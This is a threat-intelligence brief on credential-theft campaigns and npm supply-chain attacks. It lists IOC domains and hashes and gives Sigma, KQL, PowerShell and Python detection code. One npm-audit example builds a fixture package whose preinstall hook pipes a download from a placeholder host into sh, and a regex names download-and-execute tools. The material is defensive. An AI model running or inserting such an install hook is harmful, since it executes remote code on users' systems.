Recent OTX pulses indicate a coordinated surge in credential theft operations leveraging diverse attack vectors. Threat actors are utilizing social engineering (ClickFix, LofyStealer), supply chain compromise (Shai-Hulud, JINX-0164), and protocol abuse (Kali365) to infiltrate environments. The primary objective across these campaigns is the theft of session tokens, cloud credentials (AWS, Azure, GCP), cryptocurrency wallets, and browser data. Notably, there is a distinct shift towards targeting developers via compromised NPM packages and LinkedIn-based recruitment scams, alongside broad PhaaS (Phishing-as-a-Service) operations targeting enterprise SaaS platforms.
Threat Actor / Malware Profile
LofyStealer (LofyGang)
- Distribution: Social engineering targeting Minecraft players.
- Payload: Two-stage malware; 53.5MB Node.js loader dropping a 1.4MB native C++ payload.
- Behavior: Executes directly in memory to evade disk-based scanning. Steals cookies, passwords, tokens, and banking details from 8+ browsers.
- Anti-Analysis: Uses syscall evasion techniques within the Node.js loader.
ClickFix (BackgroundFix)
- Distribution: Fake image-editing tool lures.
- Payload: Delivers CastleLoader, which drops NetSupport RAT and CastleStealer (.NET).
- Behavior: Uses clipboard hijacking to copy malicious commands invoking finger.exe for payload retrieval.
- Persistence: NetSupport RAT establishes persistent C2 channels.
JINX-0164
- Distribution: LinkedIn social engineering posing as recruiters; NPM trojan packages.
- Payload: Custom macOS malware (AUDIOFIX - Python/Go) and MINIRAT.
- Behavior: Harvests developer secrets and cryptocurrency credentials.
Kali365 Operator
- Distribution: Phishing-as-a-Service (PhaaS) platforms.
- Payload: EKZ Infostealer.
- Behavior: Abuses OAuth 2.0 Device Authorization Flow to bypass MFA and steal authentication tokens for Microsoft 365, Okta, and AWS.
Shai-Hulud (Mini Shai-Hulud)
- Distribution: Compromised @redhat-cloud-services npm packages.
- Payload: TrapDoor and AES-GCM encrypted JavaScript loaders.
- Behavior: Executes via preinstall hooks to harvest CI/CD secrets, SSH keys, and cloud credentials.
IOC Analysis
The provided IOCs consist of high-fidelity indicators across multiple categories:
- Domains: C2 infrastructure such as trindastal.com (ClickFix), securehubcloud.com (Kali365), and driver-updater.net (JINX-0164). These should be immediately blocked on DNS proxies and firewalls.
- File Hashes: SHA256 and MD5 hashes for loaders (Node.js, CastleLoader) and payloads (NetSupport RAT, LofyStealer). These are critical for EDR correlation and retrospective hunting.
- URLs: Specific script endpoints (e.g., /install.sh on port 80/443 or non-standard ports like :688).
SOC teams should operationalize these by uploading the hash list to EDR solutions (CrowdStrike, SentinelOne, MDE) and creating firewall block lists for the domains.
Detection Engineering
```yaml
title: Potential ClickFix BackgroundFix Activity
id: a4b2c1d3-5566-7788-99aa-bbccddeeff00
description: Detects the execution of finger.exe invoked via command line or clipboard manipulation, a tactic used by ClickFix campaigns to retrieve payloads.
status: experimental
date: 2026/06/03
author: Security Arsenal
references:
    - https://otx.alienvault.com/pulse/667d2a3f55b8f6e3b2c1d3e4
tags:
    - attack.execution
    - attack.t1059.001
logsource:
    category: process_creation
    product: windows
detection:
    selection:
        Image|endswith: '\finger.exe'
    condition: selection
falsepositives:
    - Legitimate administrative use of finger.exe (rare)
level: high
```
```yaml
title: Suspicious Node.js Child Process (LofyStealer)
id: b5c3d2e4-6677-8899-00bb-ccddeeff0011
description: Detects Node.js spawning PowerShell or cmd.exe, indicative of the LofyStealer Node.js loader executing subsequent payloads.
status: experimental
date: 2026/06/03
author: Security Arsenal
references:
    - https://otx.alienvault.com/pulse/667d2a3f55b8f6e3b2c1d3e5
tags:
    - attack.execution
    - attack.t1059.001
logsource:
    category: process_creation
    product: windows
detection:
    # A Sigma selection matches a single process_creation event, so the parent
    # is expressed via ParentImage; two Image selections can never both be true.
    selection:
        ParentImage|endswith: '\node.exe'
        Image|endswith:
            - '\powershell.exe'
            - '\cmd.exe'
    condition: selection
falsepositives:
    - Legitimate developer build scripts
level: medium
```
```yaml
title: NPM Supply Chain Preinstall Hook Execution
id: c6d4e3f5-7788-9900-11cc-ddeeff001122
description: Detects the execution of shell commands or scripts during the npm install preinstall phase, indicative of supply chain attacks like Shai-Hulud.
status: experimental
date: 2026/06/03
author: Security Arsenal
references:
    - https://otx.alienvault.com/pulse/667d2a3f55b8f6e3b2c1d3e6
tags:
    - attack.initial_access
    - attack.t1195.002
logsource:
    category: process_creation
    product: linux
detection:
    selection:
        ParentImage|endswith: '/node'
        CommandLine|contains:
            - 'preinstall'
            - 'install.sh'
        Image|endswith:
            - '/sh'
            - '/bash'
            - '/node'
    condition: selection
falsepositives:
    - Legitimate package installation scripts
level: high
```
```kql
// Hunt for network connections to known C2 domains and suspicious ports
DeviceNetworkEvents
| where Timestamp > ago(7d)
| where RemoteUrl has_any ("trindastal.com", "poronto.com", "brionter.com", "giovettiadv.com", "securehubcloud.com", "driver-updater.net", "live.ong")
    or RemotePort in (688, 8080, 4443)
| project Timestamp, DeviceName, InitiatingProcessAccountName, RemoteUrl, RemotePort, RemoteIP
| extend IoCType = iif(RemoteUrl has_any ("trindastal.com", "poronto.com"), "ClickFix C2", iif(RemoteUrl has "securehubcloud", "Kali365 Panel", "Suspicious Domain"))
```
```powershell
# IOC Hunt Script for ClickFix and LofyStealer Hashes
$targetHashes = @(
    "bde21d8be65d31e1c380f2daae2f73c79f3e1f4bca70fb990db6fdf6c3768c92",
    "ed391a16389234f9ebb6727711baaf3e068d7f77c465708fa3e8b7d0565d7fb9",
    "f5dbaa09e60343f252a80d4a313a36ac11442d96b0896022d1a83744e3c11feb",
    "293006cec43c663ccff331795d662c3b73b4d7af5f8584e2899e286c672c9881",
    "45d4040e76a0d357dd6e236e185aba2eb82420d78640bfd1f3dede32b33931f7",
    "0dc06ecdaa63fe24859cfd955053c23245c536e4733480239d14bebf12688e35",
    "21b6409a7b84446310daca5409ad6112ac60a1e4bef97736e53fff5f63bfdef4"
)
# Case-insensitive lookup set so every file is hashed once and compared against all IOCs,
# instead of re-hashing the whole disk once per indicator
$hashSet = [System.Collections.Generic.HashSet[string]]::new([string[]]$targetHashes, [System.StringComparer]::OrdinalIgnoreCase)
Write-Host "[+] Scanning for malicious file hashes..."
$drives = Get-PSDrive -PSProvider FileSystem | Select-Object -ExpandProperty Root
foreach ($drive in $drives) {
    Write-Host "[INFO] Hashing files on drive $drive"
    Get-ChildItem -Path $drive -File -Recurse -ErrorAction SilentlyContinue |
        Get-FileHash -Algorithm SHA256 -ErrorAction SilentlyContinue |
        Where-Object { $hashSet.Contains($_.Hash) } |
        ForEach-Object {
            Write-Host "[ALERT] Malicious file found: $($_.Path) ($($_.Hash))" -ForegroundColor Red
        }
}
# Check for finger.exe execution via PowerShell Script Block Logging (event ID 4104)
Write-Host "[+] Checking Script Block Logs for finger.exe invocation..."
Get-WinEvent -FilterHashtable @{ LogName = 'Microsoft-Windows-PowerShell/Operational'; Id = 4104 } -MaxEvents 1000 -ErrorAction SilentlyContinue |
    Where-Object { $_.Message -match 'finger\.exe' } |
    Select-Object TimeCreated, Message | Format-List
```
Response Priorities
Immediate (0-24h)
- Block all listed domains and URLs on perimeter firewalls and DNS resolvers.
- Run the PowerShell IOC hunt script on all endpoints to identify dropped payloads.
- Isolate any devices exhibiting finger.exe spawning or suspicious Node.js child processes.
24-48h
- Identity Verification: If credential theft is suspected (LofyStealer, Kali365, Shai-Hulud), force reset passwords and invalidate session tokens for impacted users and service accounts.
- Audit OAuth Logs: Review Azure AD/Okta logs for "Device Code Flow" logins from unusual locations (Kali365 detection).
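The device code audit described in this step and the Kali365 tradecraft profiled above, as an added example that is not part of the brief: it assumes Microsoft Entra sign-in records in the Microsoft Graph schema (authenticationProtocol, location.countryOrRegion, status.errorCode) exported as JSON lines, and both the events and the per-user baseline are constructed sample data.

```python
"""Flag OAuth 2.0 device-code sign-ins from outside a user's usual countries.
Added example (not from the brief); assumes the Microsoft Entra sign-in schema
from Microsoft Graph. Events and baseline below are constructed sample data."""
import json

# Constructed sample sign-in events as JSON lines, not real telemetry.
SAMPLE_SIGNINS = """
{"createdDateTime":"2026-06-03T08:12:00Z","userPrincipalName":"alice@example.test","authenticationProtocol":"authorizationCode","appDisplayName":"Microsoft 365","location":{"countryOrRegion":"DE"},"status":{"errorCode":0}}
{"createdDateTime":"2026-06-03T09:40:00Z","userPrincipalName":"alice@example.test","authenticationProtocol":"deviceCode","appDisplayName":"Microsoft Azure CLI","location":{"countryOrRegion":"NG"},"status":{"errorCode":0}}
{"createdDateTime":"2026-06-03T10:05:00Z","userPrincipalName":"bob@example.test","authenticationProtocol":"deviceCode","appDisplayName":"Microsoft Azure CLI","location":{"countryOrRegion":"DE"},"status":{"errorCode":0}}
{"createdDateTime":"2026-06-03T10:07:00Z","userPrincipalName":"carol@example.test","authenticationProtocol":"deviceCode","appDisplayName":"Microsoft Azure CLI","location":{"countryOrRegion":"RU"},"status":{"errorCode":50126}}
"""
# Constructed 30-day baseline: countries each user normally signs in from.
BASELINE = {"alice@example.test": {"DE"}, "bob@example.test": {"DE", "AT"}}


def parse_signins(jsonl):
    """Parse JSON-lines sign-in records, skipping blank lines."""
    return [json.loads(line) for line in jsonl.splitlines() if line.strip()]


def device_code_anomalies(events, baseline):
    """Return successful device-code sign-ins from a country not in the user's baseline.

    A phished device code is redeemed by the victim in their own browser, so MFA
    shows as satisfied; the protocol field plus an unusual location are the
    signals left to hunt on, and each hit should trigger session revocation.
    """
    findings = []
    for ev in events:
        if ev.get("authenticationProtocol") != "deviceCode":
            continue
        if ev.get("status", {}).get("errorCode", 0) != 0:
            continue  # failed redemption: no token was issued
        user = ev["userPrincipalName"]
        country = ev.get("location", {}).get("countryOrRegion", "??")
        if country in baseline.get(user, set()):
            continue
        findings.append({"time": ev["createdDateTime"], "user": user,
                         "country": country, "app": ev.get("appDisplayName", "")})
    return findings


if __name__ == "__main__":
    for f in device_code_anomalies(parse_signins(SAMPLE_SIGNINS), BASELINE):
        print(f"[ALERT] {f['time']} {f['user']} device-code login from {f['country']} via {f['app']}")
```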
1 Week
- Architecture Hardening: Implement package-lock validation for NPM and enforce dependency review policies to mitigate supply chain risks.
- MFA Hardening: Conditional Access policies to block or require additional authentication for Device Code Flow logins.
- Developer Hygiene: Mandate the use of non-admin accounts for development work and segregate build environments from production credential access.
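For the Shai-Hulud preinstall-hook tradecraft profiled above and the dependency review policy in this step, an added example that is not the brief's own code: it walks a node_modules tree and flags lifecycle hooks that run download-and-execute commands. The RISKY patterns are assumptions to tune per organisation, and the package tree (including the placeholder.invalid host) is constructed in a temp directory.

```python
"""Audit an npm dependency tree for lifecycle hooks that run shell or
download-and-execute commands. Added example (not the brief's own code);
the RISKY patterns are assumptions and the package tree is constructed."""
import json
import os
import re
import tempfile
HOOKS = ("preinstall", "install", "postinstall")
# Command fragments rarely seen in legitimate build steps (assumption, tune per org).
RISKY = re.compile(r"curl|wget|\|\s*(ba)?sh\b|node\s+-e\b|eval\(|base64|\.sh\b|powershell", re.I)

def audit_lifecycle_scripts(root):
    """Return one finding per package whose install-time hook matches RISKY."""
    findings = []
    for dirpath, _dirs, files in os.walk(root):
        if "package.json" not in files:
            continue
        try:
            with open(os.path.join(dirpath, "package.json"), encoding="utf-8") as fh:
                pkg = json.load(fh)
        except (OSError, json.JSONDecodeError):
            continue  # unreadable or malformed manifest: skip rather than abort the audit
        scripts = pkg.get("scripts") or {}
        for hook in HOOKS:
            cmd = scripts.get(hook)
            if cmd and RISKY.search(cmd):
                findings.append({"package": pkg.get("name", dirpath), "hook": hook, "command": cmd})
    return findings

def build_sample_tree():
    """Construct a node_modules tree: two benign packages and one with a hostile preinstall."""
    root = tempfile.mkdtemp()
    samples = {
        "left-pad-clean": {"name": "left-pad-clean", "scripts": {"test": "node test.js"}},
        "native-build": {"name": "native-build", "scripts": {"install": "node-gyp rebuild"}},
        "evil-scoped": {"name": "@example-scope/evil",  # placeholder host, not a real IOC
                        "scripts": {"preinstall": "curl -s http://placeholder.invalid/install.sh | sh"}},
    }
    for directory, pkg in samples.items():
        os.makedirs(os.path.join(root, "node_modules", directory))
        with open(os.path.join(root, "node_modules", directory, "package.json"), "w", encoding="utf-8") as fh:
            json.dump(pkg, fh)
    return root

if __name__ == "__main__":
    for f in audit_lifecycle_scripts(build_sample_tree()):
        print(f"[ALERT] {f['package']} {f['hook']}: {f['command']}")
```

Pair the audit with `npm ci --ignore-scripts` in CI so lifecycle hooks only run after a reviewer has looked at the findings.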